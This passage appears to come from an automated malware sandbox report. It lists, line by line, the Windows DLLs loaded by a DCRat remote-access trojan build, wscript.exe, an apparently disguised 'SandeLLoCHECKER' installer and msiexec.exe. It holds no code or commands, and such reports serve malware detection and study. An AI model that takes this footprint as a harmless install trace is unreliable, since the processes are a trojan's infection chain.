                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: davhlpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msimg32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dbghelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cabinet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: lpk.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msihnd.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: atlthunk.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: iconcodecservice.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: explorerframe.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: tsappcmp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cryptnet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: webio.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.xaml.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dcomp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windowmanagementapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: inputhost.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: uiamanager.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dxgi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mrmcorer.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: d3d11.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.immersive.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: d3d10warp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dataexchange.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dxcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: d2d1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: uiautomationcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.globalization.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: bcp47mrm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: directmanipulation.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: threadpoolwinrt.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: oleacc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
